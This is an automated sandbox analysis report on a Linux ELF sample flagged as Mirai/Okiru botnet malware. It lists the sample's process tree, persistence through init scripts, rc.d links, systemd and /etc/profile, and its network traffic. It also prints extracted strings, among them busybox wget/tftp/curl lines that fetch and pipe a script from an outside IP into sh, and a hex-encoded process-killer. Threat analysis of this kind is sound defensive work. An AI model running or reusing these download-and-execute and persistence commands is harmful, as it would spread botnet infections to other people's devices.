Edit tour

Linux Analysis Report
m68k.nn.elf

Overview

General Information

Sample name:	m68k.nn.elf
Analysis ID:	1563710
MD5:	61def540fecb4aea358612e354b3466d
SHA1:	e10244da813f13e237f6269ac1ff189a5e589096
SHA256:	3372697715944f3740c624a2caca3d146610d780aa79f69bcbdce8d860af29db
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Mirai

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1563710
Start date and time:	2024-11-27 11:22:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	m68k.nn.elf
Detection:	MAL
Classification:	mal80.spre.troj.evad.linELF@0/11@0/0

Warnings

VT rate limit hit for: m68k.nn.elf

Runtime Messages

Command:	/tmp/m68k.nn.elf
PID:	6238
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

m68k.nn.elf (PID: 6238, Parent: 6158, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.nn.elf

m68k.nn.elf New Fork (PID: 6255, Parent: 6238)

m68k.nn.elf New Fork (PID: 6269, Parent: 6238)

sh (PID: 6269, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6287, Parent: 6269)

systemctl (PID: 6287, Parent: 6269, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

m68k.nn.elf New Fork (PID: 6324, Parent: 6238)

sh (PID: 6324, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6326, Parent: 6324)

chmod (PID: 6326, Parent: 6324, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

m68k.nn.elf New Fork (PID: 6327, Parent: 6238)

sh (PID: 6327, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6333, Parent: 6327)

ln (PID: 6333, Parent: 6327, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

m68k.nn.elf New Fork (PID: 6334, Parent: 6238)

sh (PID: 6334, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"

m68k.nn.elf New Fork (PID: 6338, Parent: 6238)

sh (PID: 6338, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6354, Parent: 6338)

chmod (PID: 6354, Parent: 6338, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/m68k.nn.elf

m68k.nn.elf New Fork (PID: 6355, Parent: 6238)

sh (PID: 6355, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6360, Parent: 6355)

mkdir (PID: 6360, Parent: 6355, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

m68k.nn.elf New Fork (PID: 6361, Parent: 6238)

sh (PID: 6361, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6366, Parent: 6361)

ln (PID: 6366, Parent: 6361, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf

m68k.nn.elf New Fork (PID: 6367, Parent: 6238)

udisksd New Fork (PID: 6249, Parent: 799)

dumpe2fs (PID: 6249, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6289, Parent: 799)

dumpe2fs (PID: 6289, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6291, Parent: 6290)

snapd-env-generator (PID: 6291, Parent: 6290, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

gnome-session-binary New Fork (PID: 6292, Parent: 1477)

sh (PID: 6292, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

gsd-housekeeping (PID: 6292, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping

gdm3 New Fork (PID: 6337, Parent: 1320)

Default (PID: 6337, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 6353, Parent: 1320)

Default (PID: 6353, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

udisksd New Fork (PID: 6376, Parent: 799)

dumpe2fs (PID: 6376, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6422, Parent: 799)

dumpe2fs (PID: 6422, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6423, Parent: 799)

dumpe2fs (PID: 6423, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
m68k.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
m68k.nn.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
6238.1.00007f684c001000.00007f684c01e000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6238.1.00007f684c001000.00007f684c01e000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6255.1.00007f684c001000.00007f684c01e000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6255.1.00007f684c001000.00007f684c01e000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: m68k.nn.elf PID: 6238	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: m68k.nn.elf PID: 6255	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 1 entries

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: m68k.nn.elf

ReversingLabs: Detection: 34%

Source: m68k.nn.elf	String: (deleted)/proc/self/exe/proc/%s/exe/proc/opendirsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/login193.143.1.70malloc[start_pid_hopping] Failed to clone: %s
Source: m68k.nn.elf	String: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- \| sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- \| shGET /dlr. HTTP/1.0

Source: global traffic

TCP traffic: 192.168.2.23:38962 -> 154.216.19.139:199

Source: /tmp/m68k.nn.elf (PID: 6238)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43

Source: m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.38.dr, custom.service.12.dr	String found in binary or memory: http://193.143.1.70/
Source: m68k.nn.elf	String found in binary or memory: http://193.143.1.70/curl.sh
Source: m68k.nn.elf	String found in binary or memory: http://193.143.1.70/lol.sh
Source: m68k.nn.elf	String found in binary or memory: http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: (deleted)/proc/self/exe/proc/%s/exe/proc/opendirsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /tmp/.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesn
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://193.143.1.70/lol.sh -O- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://193.143.1.70/lol.sh -O- \| sh;/bin/busybox tftp -g http://193.143.1.70/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://193.143.1.70/ lol.sh lol.sh && sh lol.sh;curl http://193.143.1.70/curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/m68k.nn.elf (PID: 6255)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6255)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6255)	SIGKILL sent: pid: 1664, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6255)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6255)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6255)	SIGKILL sent: pid: 6292, result: successful	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6255)	SIGKILL sent: pid: 6313, result: successful	Jump to behavior

Source: classification engine

Classification label: mal80.spre.troj.evad.linELF@0/11@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/m68k.nn.elf (PID: 6238)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/m68k.nn.elf (PID: 6238)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6333)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6366)	File: /etc/rc.d/S99m68k.nn.elf -> /etc/init.d/m68k.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/m68k.nn.elf (PID: 6238)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6326)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6354)	File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 6269)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6324)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6327)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6334)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6338)	Shell command executed: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6355)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/m68k.nn.elf (PID: 6361)	Shell command executed: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6326)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6354)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/m68k.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6360)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 6287)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 6238)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6326)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6354)	File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/m68k.nn.elf (PID: 6238)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/m68k.nn.elf (PID: 6238)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6334)	Writes shell script file to disk with an unusual file extension: /etc/init.d/m68k.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/m68k.nn.elf (PID: 6238)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6334)	File: /etc/init.d/m68k.nn.elf			Jump to dropped file

Source: /tmp/m68k.nn.elf (PID: 6238)

Queries kernel information via 'uname':

Jump to behavior

Source: m68k.nn.elf, 6238.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp	Binary or memory string: \U/tmp/qemu-open.ehO1mT-
Source: m68k.nn.elf, 6238.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp, m68k.nn.elf, 6255.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.nn.elf
Source: m68k.nn.elf, 6238.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp, m68k.nn.elf, 6255.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: m68k.nn.elf, 6255.1.0000555cbd486000.0000555cbd50b000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: m68k.nn.elf, 6255.1.0000555cbd486000.0000555cbd50b000.rw-.sdmp	Binary or memory string: !/usr/bin/vmtoolsdO
Source: m68k.nn.elf, 6238.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp, m68k.nn.elf, 6255.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: m68k.nn.elf, 6238.1.0000555cbd486000.0000555cbd50b000.rw-.sdmp, m68k.nn.elf, 6255.1.0000555cbd486000.0000555cbd50b000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k
Source: m68k.nn.elf, 6238.1.0000555cbd486000.0000555cbd50b000.rw-.sdmp, m68k.nn.elf, 6255.1.0000555cbd486000.0000555cbd50b000.rw-.sdmp	Binary or memory string: \U!/etc/qemu-binfmt/m68k
Source: m68k.nn.elf, 6238.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: m68k.nn.elf, 6238.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp, m68k.nn.elf, 6255.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp	Binary or memory string: panel/wrapper-2./qemu-open.XXXXX
Source: m68k.nn.elf, 6238.1.00007ffef8785000.00007ffef87a6000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.ehO1mT

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6238.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6255.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6238.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6255.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6255, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6238.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6255.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: m68k.nn.elf, type: SAMPLE
Source: Yara match	File source: 6238.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6255.1.00007f684c001000.00007f684c01e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: m68k.nn.elf PID: 6255, type: MEMORYSTR

Mitre Att&ck Matrix

